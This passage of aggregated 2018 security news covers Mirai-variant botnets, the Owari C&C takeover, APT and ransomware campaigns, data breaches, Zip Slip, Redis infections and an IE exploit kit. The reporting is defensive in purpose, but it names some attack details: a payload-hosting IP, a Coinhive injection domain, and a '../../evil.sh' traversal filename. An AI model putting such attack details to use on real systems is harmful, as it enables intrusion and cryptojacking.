Fortinet discussed OMG in February 2018. "This is the first time we have seen a modified Mirai capable of DDOS attacks as well as setting up proxy servers on vulnerable IoT devices. With this development, we believe that more and more Mirai-based bots are going to emerge with new ways of monetization," it concluded.

Wicked is the latest Mirai variant. "Similar to Satori variant 3," writes ASERT, "Wicked trades in Mirai's credential scanning function for its own RCE scanner. Wicked's RCE scanner targets Netgear routers and CCTV-DVR devices." When vulnerable devices are found, "a copy of the Owari bot is downloaded and executed."

However, an analysis of the same bot by Fortinet in May 2018 comes to a slightly different conclusion. The string 'SoraLOADER' suggests a purpose to distribute the Sora botnet. Further analysis showed that in practice it attempted to download the Owari botnet, but actually downloaded the Omni botnet. "We can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author's succeeding projects," says Fortinet.

The Mirai developer may have been apprehended, but in making his source code public, Mirai and Mirai variants continue to grow. The IoT ecosphere that Mirai and its variants target and exploit is still in its infancy. There were nearly 17 billion connected devices in 2017; but this is expected to rise to around 125 billion by 2030 according to a new analysis from IHS Markit. Vendors continue to rush their products in order to get early market share, but often at the cost of built in security.

"Malware authors will continue to leverage IoT based malware in automated fashion, quickly increasing the botnet size through worm-like spreading, network proxy functionality, and automated exploitation of vulnerabilities in internet facing devices. It is important for organizations to apply proper patching, updates, and DDoS mitigation strategies to defend their organizations," warns ASERT.

It’s not a joke, Owari botnet operators used root as username and password to access a C&C
6.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

Owari botnet

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.

North Korea-Linked Covellite APT group stopped targeting organizations in the U.S.
6.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked by experts at industrial cybersecurity firm Dragos as Covellite, has stopped targeting US organizations.
Anyway, the group, that is believed to be linked to the notorious Lazarus APT group, is continuing to target organizations in Europe and East Asia.

The group has been around at least since 2017 and is still active, the APT has targeted civilian electric energy organizations to steal intellectual property and gather intelligence on industrial operations.

Differently, from other threat actors that are focused on industrial control systems, Covellite seems to be not interested in sabotage.

In September 2017, experts from FireEye spotted a wave of attacks launched by the APT group against U.S. electric companies, the phishing messages used weaponized Word documents to deliver a piece of malware.

“COVELLITE compromises networks associated with civilian electric energy worldwide and gathers intelligence on intellectual property and internal industrial operations. COVELLITE lacks an industrial control system (ICS) specific capability at this time.” reads the post published by Dragos.

“COVELLITE operates globally with targets primarily in Europe, East Asia, and North America. US targets emerged in September 2017 with a small, targeted phishing campaign directed at select U.S. electric companies.”

The experts linked the attacks to Pyongyang and confirmed that the group did not show the ability to disrupt power supply.


According to Dragos, the infrastructure and the malicious code used by the COVELLITE group are similar to the ones used by the LAZARUS APT GROUP, aka Hidden Cobra.

“technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related.” continues the post.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,”

Dragos experts have recently published reports on other hacker groups focused on ICS and SCADA systems, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime.

Thousands of organizations leak sensitive data via misconfigured Google Groups
6.6.2018 securityaffairs Security

Security experts reported widespread Google Groups misconfiguration exposes sensitive information.
Administrators of organizations using Google Groups and G Suite must review their configuration to avoid the leakage of internal information.

Security researchers from Kenna Security have recently discovered that 31 percent of 9,600 organizations analyzed is leaking sensitive e-mail information.

The list of affected entities also includes Fortune 500 companies, hospitals, universities and colleges, newspapers and television stations, and even US government agencies.

“Organizations utilizing G Suite are provided access to the Google Groups product, a web forum directly integrated with an organization’s mailing lists. Administrators may configure a Google Groups interface when creating a mailing list.” reads the blog post published by Kenna Security.

“Due to complexity in terminology and organization-wide vs group-specific permissions, it’s possible for list administrators to inadvertently expose email list contents. In practice, this affects a significant number of organizations”

The discovery is not new, back in 2017 experts discovered wrong configurations of G Suite that can lead to data leakage.

Unfortunately, since the first advisory published by experts at RedLock, many installs continue to leak data. According to Kenna Security, the main reason is Google Groups uses a complex terminology and organisation-wide vs group-specific permissions.

“Due to complexity in terminology and organization-wide vs group-specific permissions, it’s possible for list administrators to inadvertently expose email list contents. In practice, this affects a significant number of organizations” continues the post.

When a G Suite admin creates a Groups mailing list for specific recipients, it configures a Web interface for the list, available to users at https://groups.google.com.

Google Group privacy settings for individuals can be adjusted on both a domain and a per-group basis. In affected organizations, the Groups visibility setting is available by searching “Groups Visibility” after logging into https://admin.google.com and it is configured to “Public on the Internet”

Google Groups

To discover if an organization is affected, administrators can browse to the configuration page by logging into G Suite as an administrator and typing “Settings for Groups for Business” or simply using this direct link.

“In almost all cases – unless you’re explicitly using the Google Groups web interface – this should be set to “Private”.” continues the post.

“If publicly accessible, you may access your organization’s public listing at the following link: https://groups.google.com/a/[DOMAIN]/forum/#!forumsearch/”

Administrators have to set as private the “Google Group” to protect internal information such as customer reviews, invoices payable, password recovery / reset e-mails, and more.

It is important to highlight that Google doesn’t consider configuration issues as a vulnerability, experts recommend administrators to read the Google Groups documentation, set the sharing setting for “Outside this domain – access to groups” to “private”.

Updated: Microsoft reportedly acquires the GitHub popular code repository hosting service
6.6.2018 securityaffairs IT

Microsoft has reportedly acquired the popular code repository hosting service GitHub, but at the time of writing there is no news about how much Microsoft paid for the platform.
Microsoft has reportedly acquired the popular code repository hosting service GitHub.

GitHub was last valued at $2 billion in 2015, but at the time of writing there is no news about how much Microsoft paid for the platform.

“The software maker has agreed to acquire GitHub, the code-repository company popular with many software developers, and could announce the deal as soon as Monday, according to people familiar with the matter.” reported a post published by Bloomberg.

GitHub board decided to sell to Microsoft because of the leadership of Microsoft’s CEO Satya Nadella and his vision on the open source technology.

Github currently hosts more than 80 million code repositories, it has a privileged position in the software development community, the company that owns this platform could have strategic benefits from the knowledge of the projects that are hosted on the platform.

Of course, part of the open source community disagrees with Github move and is opting to switch to competitor services such as BitBucket or GitLab.

Bryan Lunduke
To those that have @GitHub accounts:

If @Microsoft buys GitHub... would you continue to use it? Or would you move your repositories to a different service?

6:21 PM - Jun 2, 2018
32%Stick with GitHub
68%Move to another service
632 votes • Final results
95 people are talking about this
Twitter Ads info and privacy
Many development teams fear Microsoft could abuse its position after the acquisition gaining full access to the millions of private projects hosted on GutHub.

The code hosting service GitLab has seen a massive traffic spike after news of the deal, with thousands of projects and code repositories are being transferred from GitHub.

code repository GitHub deal

At the time of writing, neither Microsoft nor GitHub has commented on the acquisition deal.
Updated on June 4
In a blog post published today, Microsoft confirmed that will acquire GitHub for $7.5 billion in Microsoft stock.

“GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device.” reads the blog post.

“Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives.”

NYT: Facebook APIs gave device makers deep access to user data. FB disagrees
6.6.2018 securityaffairs

Facebook APIs granted access to the data belonging to FB users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.
After the Cambridge Analytica privacy scandal, Facebook is now facing new problems because it is accused of sharing user data with over 60 device-makers.

The social network giant had granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions, “Like” buttons, address books, and other features without requiring their users to install a separate app.

“Facebook has reached data-sharing partnerships with at least 60 device makers — including Apple, Amazon, BlackBerry, Microsoft and Samsung — over the last decade, starting before Facebook apps were widely available on smartphones, company officials said.” states the New York Times.

“The deals allowed Facebook to expand its reach and let device makers offer customers popular features of the social network, such as messaging, “like” buttons and address books.”

The controversial practice started more than 10 years ago, before Facebook apps were widely available on smartphones.

The partnerships raise concerns about the company’s privacy protections and compliance with a 2011 consent decree with the Federal Trade Commission. The decree barred the social network giant from sharing data of users’ Facebook friends with other companies without their explicit consent.
Facebook APIs- Cambridge Analytica
To support the accusation, Michael LaForgia, a New York Times reporter, used a 2013 Blackberry device to access his Facebook account with roughly 550 friends.

He discovered that a BlackBerry app called “The Hub” was still able to harvest private data from 556 of his friends, exposed info including religious and political orientation.

The reported also discovered that The Hub was also able to acquire “identifying information” for up to 294,258 friends of his Facebook friends.

“After connecting to Facebook, the BlackBerry Hub app was able to retrieve detailed data on 556 of Mr. LaForgia’s friends, including relationship status, religious and political leanings and events they planned to attend.” continues the NYT.

“Facebook has said that it cut off third parties’ access to this type of information in 2015, but that it does not consider BlackBerry a third party in this case.”

Facebook responded to the accusation of the NYT report in a blog post entitled “Why We Disagree with The New York Times.”

The social network confirmed that the Facebook APIs were created to allow device-makers to improve the experience of Facebook users implementing features on their operating systems, you have to consider that at the time there were no apps.

“The New York Times has today written a long piece about our device-integrated APIs — software we launched 10 years ago to help get Facebook onto mobile devices.” states the post published by Facebook.

“In the early days of mobile, the demand for Facebook outpaced our ability to build versions of the product that worked on every phone or operating system. It’s hard to remember now, but back then there were no app stores.”

“So companies like Facebook, Google, Twitter and YouTube had to work directly with operating system and device manufacturers to get their products into people’s hands. This took a lot of time—and Facebook was not able to get to everyone.”

“To bridge this gap, we built a set of device-integrated APIs that allowed companies to recreate Facebook-like experiences for their individual devices or operating systems. Over the last decade, around 60 companies have used them—including many household names such as Amazon, Apple, Blackberry, HTC, Microsoft, and Samsung.”

The company added that it carefully monitored the use of the Facebook APIs avoiding any abuses, it also added that device-vendors signed agreements that prevented Facebook users’ information from being used for other purposes.

“Partners could not integrate the user’s Facebook features with their devices without the user’s permission. And our partnership and engineering teams approved the Facebook experiences these companies built,” continues the post.

“Contrary to claims by the New York Times, friends’ information, like photos, was only accessible on devices when people made a decision to share their information with those friends. We are not aware of any abuse by these companies.”

Facebook APIs mobile devices

After more than ten years things are changed and the Cambridge Analytica scandal has made used aware the importance of their privacy

Today both Facebook iOS and Android apps are very popular and the criticized Facebook APIs are no more used, for this reason, the company began “winding down” the partnerships in April.

“This is very different from the public APIs used by third-party developers, like Aleksandr Kogan. These third-party developers were not allowed to offer versions of Facebook to people and, instead, used the Facebook information people shared with them to build completely new experiences.” concluded Facebook.

“Now that iOS and Android are so popular, fewer people rely on these APIs to create bespoke Facebook experiences. It’s why we announced in April that we’re winding down access to them. We’ve already ended 22 of these partnerships. As always we’re working closely with our partners to provide alternative ways for people to still use Facebook.”

Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw
6.6.2018 securityaffairs

Security experts at security firm Intezer have recently discovered backdoor, associated with the operation of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).
The Remote Control System (RCS) is the surveillance software developed by the HackingTeam, it was considered a powerful malware that is able to infect also mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VOIP voice calls (e.g. Skype), the mobile version, available for all the OSs (Apple, Android, Symbian, and Blackberry), is also able to completely control the handset and its components, including the camera, the microphone and GPS module.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed using UPX, the malicious code is able to determine if it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor dll to %localappdata%\Temp\\<random>.dat, then checks OS version to determine the backdoor to launch.

The malware halts its execution if detect the presence of Qhioo360 products. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

The analysis of the backdoor revealed it uses two main functions in their IronStealer and Iron ransomware families, the VM detection code that was borrowed from the HackingTeam’s “Soldier” implant and the DynamicCall module from HackingTeam’s “core” library.

iron cybercrime group backdoor extension

The malware used a patched version of the popular Adblock Plus chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also includes Adblock Plus for IE that is capable of injecting remote JavaScript, a functionality, however, is no longer automatically used.

The malware automatically decrypts a hard coded shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin address.

The malicious code is able to drop two malware. a variant of “JbossMiner Mining Worm” tracked as Xagent and the Iron ransomware.

The group used the malware to stealing cryptocurrency from the victim’s workstation, the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets.

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.

Further details, including the IoCs are reported in the blog post published by the researchers.

Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
6.6.2018 securityaffairs

Two months after the release of the security updates for the drupalgeddon2 flaw, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.
In March, the Drupal developers Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600, aka drupalgeddon2, affecting Drupal 7 and 8 versions.

Both Drupal 8.3.x and 8.4.x are not supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates that were issued a few days later.

The vulnerability that could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.

Two months after the release of the security updates, experts continue to see vulnerable websites running on flawed versions of Drupal that hasn’t installed security patches.

According to the security researcher Troy Mursch, there are over 115,000 Drupal sites that have installed security patched for drupalgeddon2 vulnerability.

The experts scanning the Internet for websites running Drupal 7.x CMS version found over 500,000 sites, 115,070 of them running outdated versions of the popular CMS that were vulnerable to the Drupalgeddon 2 flaw. The scan didn’t search for 6.x and 8.x sites.
“How many Drupal sites are vulnerable?To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

115,070 sites were outdated and vulnerable.
134,447 sites were not vulnerable.
225,056 sites I could not ascertain the version used.”

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns are continuing even after his first report,

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign, the document includes now data on several different campaigns he discovered.

Bad Packets Report
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign.

9:37 AM - May 31, 2018
See Bad Packets Report's other Tweets
Twitter Ads info and privacy

Bad Packets Report
31 May
This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign. pic.twitter.com/dJbqshysUg

Bad Packets Report
This case of #cryptojacking is caused by upgraderservices[.]cf/drupal.js which injects #Coinhive. Site key "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos" is used. pic.twitter.com/a9dxCfbR3s

9:37 AM - May 31, 2018

See Bad Packets Report's other Tweets
Twitter Ads info and privacy
The expert published IoCs for the campaign, the presence online of 115,000 of Drupal 7.x web sites is very danger, a gift for crooks that can abuse them for a broad range of illegal activities.

The author of the Sigrun Ransomware decrypts Russian victims’ files for free
6.6.2018 securityaffairs

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, others have to pay a ransom of $2,500 worth of Bitcoin or Dash for the victims.
We have reported several cases where Russian malware authors avoid infecting computers in their country, but the case we are going to discuss is interesting too.

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while the malware demands the payment of a ransom of $2,500 worth of Bitcoin or Dash for the victims.

The case was first spotted by the malware researcher Alex Svirid, and other experts confirmed his discovery.

Alex Svirid
31 May
Sigrun Ransomware author free decrypt files for users from some countries former USSR (with Russian primary language)

Yup, many are doing that. Guess who is Russian and who is American? pic.twitter.com/1pS6NhPtXN

3:36 PM - May 31, 2018

See S!Ri's other Tweets
Twitter Ads info and privacy
The Sigrun ransomware also avoids infecting Russian victims by detecting the keyboard layout, this behavior allows Russian vxers to avoid the response of local authorities.

When Sigrun ransomware is executed, it will first check “HKEY_CURRENT_USER\Keyboard Layout\Preload” to determine if it is set to the Russian layout. If the machine is using a Russian layout, it will not encrypt its files and delete itself.

Experts pointed out that the ransomware also infects users in the former USSR Republics because many of them don’t use the Russian keyboard layout for political reason. For this reason, the authors of the Sigrun ransomware decided to provide for free the decryption key to Russian victims.

“Ukranian users don’t use russian layout because of political reasons. So we decided to help them if they was infected,” the Sigrun author told BleepingComputer via email.

“We have already added avoiding Ukrainian layout like was in Sage ransomware before.” They also told us that the email images above are not from Sigrun but another ransomware.

Lawrence Abrams from BleepingComputer has spoken with the author of the malware that told him that he isn’t from former USSR republics.

“Finally, the Sigrun developer told us that they are “not from former USSR republics. I added it because of my Belarus partners.” added Abrams.

When Sigrun ransomware is executed on a computer, it will scan a computer for files to encrypt, when it encrypts a file it will append the .sigrun extension to the encrypted file’s name. The malware creates two ransom notes named RESTORE-SIGRUN.txt and RESTORE-SIGRUN.html in each folder containing encrypted files.

Experts noticed that it doesn’t encrypt files that match certain extensions, filenames, or that are located in particular folders.

The ransom notes include information on the infection and payment instructions.
“At this time, the Sigrun Ransomware cannot be decrypted for free unless you are a Russian victim and the author helps you,” concluded Lawrence.

Further technical details, including IoCs, are reported in the analysis shared by BleepingComputer.

MyHeritage data breach – 92.3 million user credential exposed
6.6.2018 securityaffairs Incindent

A security researcher discovered email addresses and hashed passwords of roughly 92.3 million Myheritage users stored on a private server outside the company.
The huge trove of data was contained in a file named “,” according to the experts the information is authentic and comes from Myheritage.

“Today, June 4, 2018 at approximately 1pm EST, MyHeritage’s Chief Information Security Officer received a message from a security researcher that he had found a file named “myheritage” containing email addresses and hashed passwords, on a private server outside of MyHeritage.” reads the data breach notification published by the company.

“Our Information Security Team received the file from the security researcher, reviewed it, and confirmed that its contents originated from MyHeritage and included all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”

MyHeritage offers a service for the investigation of family history and the reconstruction of the family tree through the DNA analysis.

myHeritage familytree

The expert who made the disconcerting discovery reported it to the company on June 4, 2018, the incident seems to have affected those users who signed up for the service before and including Oct. 26, 2017.

The expert only found usernames and hashed passwords, no other info was discovered on the server hosting the file.

The company pointed out that passwords were not stored in a plain text but did not explain the hashing mechanism used to protect them.

MyHeritage handles billing information through third parties, while DNA data and other sensitive data are stored on segregated systems.

At the time the company hasn’t observed any abuse of compromised data.

“Since Oct 26, 2017 (the date of the breach) and the present we have not seen any activity indicating that any MyHeritage accounts had been compromised.” continues the notification.

“We believe the intrusion is limited to the user email addresses. We have no reason to believe that any other MyHeritage systems were compromised.”

The company set up an Information Security Incident Response Team to investigate the security breach and is going to hire cybersecurity firm to conduct comprehensive forensic investigations.

The company announced it is planning to introduce the two-factor authentication feature to provide a further protection to its users.

“MyHeritage users who have questions or concerns about this incident can contact our security customer support team via email on privacy@myheritage.com or by phone via the toll-free number (USA) +1 888 672 2875, available 24/7.” concluded the company.

“For all registered users of MyHeritage, we recommend that for maximum safety, they change their password on MyHeritage.”

‘Zip Slip’ arbitrary file overwrite vulnerability affects thousands of projects
6.6.2018 securityaffairs

Security experts from British software firm Snyk have discovered a critical vulnerability, dubbed ‘Zip Slip’ that affects thousands of projects across many industries.
The flaw, that remained hidden for years, could be exploited by attackers to execute arbitrary code on the vulnerable systems.

zip slip

The Zip Slip is an arbitrary file overwrite vulnerability that could be triggered with a directory traversal attack while extracting files from an archive,

Unfortunately, the flaw affects many archive formats, including tar, jar, war, cpio, apk, rar, and 7z.

“Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution.” states the blog post published by the experts.

“It was discovered and responsibly disclosed by the Snyk Security team ahead of a public disclosure on 5th June 2018, and affects thousands of projects, including ones from HP, Amazon, Apache, Pivotal and many more (CVEs and full list here).”

Thousands of projects written in several programming languages (i.e. JavaScript, Ruby, Java, .NET and Go) from tech giants include vulnerable libraries and codes.

Attackers can trigger the Zip Slip flaw using a specially crafted archive file that holds directory traversal filenames (e.g. ../../evil.sh).
Once a vulnerable code o library has extracted the content of the archive, it would allow attackers to unarchive malicious files outside of the folder where it should reside.

“The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.” continues the analysis.

“The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.”

The researchers published proof-of-concept Zip Slip archives and released a video PoC for the Zip Slip flaw.

Experts shared two sample examples of malicious zip and tar files (for both Unix and windows files systems) with filenames that extract a file to the /tmp/ or \Temp\ folders

Since April, Snyk privately reported the flaw to the maintainers of all vulnerable libraries and projects, it is maintaining a GitHub repository listing all flawed projects. The repository is open to contributions from the wider community to ensure it holds the most up to date status.

HR Software company PageUp victim of a Data Breach, experts fear a domino effect
6.6.2018 securityaffairs Incindent

HR Software Firm PageUp is the last victim of a data breach, the company has 2.6 million active users across over 190 countries.
Another day another data breach makes the headlines, this time the victim is the HR Software Firm PageUp. PageUp is an Australian company with 2.6 million active users across over 190 countries.

The company notified the incident to its customers, informing them that it has launched a forensic investigation with the support from an independent 3rd party firm.

The company has notified the breach to law enforcement and data regulators in Australia and the United Kingdom.

According to the firm, on May 28 attackers accessed to internal records may continuing customer data, including names, contact information, usernames, and password hashes. Other sensitive data, including signed employment contracts and resumes, are not affected because they are stored on servers that were not affected by the security breach.

“On May 23, 2018, PageUp detected unusual activity on its IT infrastructure and immediately launched a forensic investigation. On May 28, 2018 our investigations revealed that we have some indicators that client data may have been compromised, a forensic investigation with assistance from an independent 3rd party is currently ongoing.” reads the data breach notification published by the company.

“There is no evidence that there is still an active threat, and the jobs website can continue to be used. All client user and candidate passwords in our database are hashed using bcrypt and salted, however, out of an abundance of caution, we suggest users change their password,”

At the time, the firm did not disclose technical details about the security breach, it only confirmed that its systems were infected by a malware.

“we can share that the source of the incident was a malware infection. The malware has been eradicated from our systems and we have confirmed that our anti-malware signatures can now detect the malware. We see no further signs of malicious or unauthorised activity and are confident in this assessment.” continues the notification.

Just after the news of the breach, some of the company that uses the PageUp service have shut down their online recruitment pages and notified job applicants

According to the Australia Post, data potentially impacted by the incident may include:

Bank details
Tax File Number and superannuation details
Diversity information
Emergency contact information
Conditions of offer and employment
Mobile phone number
Questions relevant to the job such as if you have Work Rights or an Australian citizenship
Education and work experience
License number

After the incident, the Australian telecoms giant Telstra suspended its online recruitment and notified the issue to the applicants.

“The online recruitment system we use is currently unavailable.
We are aware of a security incident with one of our vendors, PageUp, a company that provides us software services used as part of our employee recruitment processes.” states the security advisory published by Telstra,

“We are among a number of organisations who use PageUp. PageUp has provided more information here. We have held discussions with PageUp to understand any possible impact to the security of the services they provide”

Unfortunately, many other organization may have been impacted by the incident.

Imperva’s research shows 75% of open Redis servers are infected
3.6.2018 securityaffairs

According to the security experts at Imperva firm, three open Redis servers out of four are infected with malware.
The discovery is the result of analysis conducted by running Redis-based honeypot servers for some months.

Since their initial report on the RedisWannaMine attack that propagates through open Redis and Windows servers, the experts from Imperva have discovered a new wave of attacks against Redis servers exposed online without authentication.

One of the most common attacks against Redis servers consists of adding SSH keys, so the attacker can remotely access the machine and take it over.

“Having let our honeypot collect data for some time, we noticed that different attackers use the same keys and/ or values to carry out attacks.” states the report published by the experts.

“As such, a shared key or value between multiple servers is a clear sign of a malicious botnet activity.”

The experts used the SSH keys they’ve collected through their honeypot to scan Redis servers that were left exposed online for the presence of these keys.

The experts obtained a list of over 72,000 Redis servers available online by using the shodan query ‘port:6379,’ over 10,000 of these responded to its scan request without an error, allowing researchers to determine locally installed SSH keys.

Redis servers scans

The discovery was disconcerting, over 75% of these Redis servers were using an SSH key associated with a botnet.

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected.” continues the report.

“Also according to our honeypot data, the infected servers with “backup” keys were attacked from a medium-sized botnet ( ) located at China (86% of IPs).”

Imperva revealed that its customers were attacked more than 75k times, by 295 IPs that run publicly available Redis servers, this means that threat actors are exploiting vulnerable installs to compose their botnet and power a broad range of attacks (SQL injection, cross-site scripting, malicious file uploads, remote code executions, etc).

The “crackit” SSH key in the above table is known to be used at least since 2016 by a known threat actor to spread ransomware and to blackmail the owners of the compromised servers.

The main problem with Redis servers is that owners ignore that Redis doesn’t use a secure configuration by default because they are designed to operate in closed IT networks.

Before some recommendation to the admins operating Redis servers:

Make sure you follow Redis Security notes, i.e.
Don’t expose your Redis to the internet
If possible, apply authentication
Don’t store sensitive data in clear text
Monitor your Redis server to make sure it is not infected.
You can monitor processes or CPU consumption to check if a crypto mining malware is running. You can also use the keys and values mentioned in the tables above to monitor the data stored in your Redis server.
Make sure you run Redis with the minimal privileges necessary. Running it with root user, for example, is a bad practice, since it greatly increases the potential damage that an attacker can cause.

Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
3.6.2018 securityaffairs

Cyber criminals recently added the code for the CVE-2018-8174 Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.
Crooks recently added the code for an Internet Explorer zero-day vulnerability to the infamous RIG exploit kit.

The Internet Explorer zero-day vulnerability, tracked as CVE-2018-8174, was first discovered a few weeks ago, it affects VBScript implemented in Internet Explorer and Microsoft Office.

Researchers from Advanced Threat Response Team of 360 Core Security Division first reported the zero-day

In May, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses it. The experts codenamed the vulnerability as “double kill” exploit.

Qihoo 360 researchers reported the vulnerability to Microsoft that addressed the flaw in the May 2018 Patch Tuesday security updates.

After the release of the security updates, on May 8, experts from Kaspersky Lab and Malwarebytes published a detailed analysis of the vulnerability, while researchers from Morphisec security firm released a proof-of-concept (PoC) code.

Experts released a Metasploit module for the exploitation of the CVE-2018-8174 once the PoC code was available online.

The availability of the PoC code for the vulnerability is a gift for vxers, in the specific case, the crooks included the code for the CVE-2018-8174 flaw in the RIG exploit kit.

“A Proof of Concept for Internet Explorer 11 on Windows 7 has been shared publicly 3 days ago, it’s now beeing integrated in Browser Exploit Kits.” wrote the security researcher Kafeine.

“This will replace CVE-2016-0189 from july 2016 and might shake the Drive-By landscape for the coming months.”

CVE-2018-8174 RIG

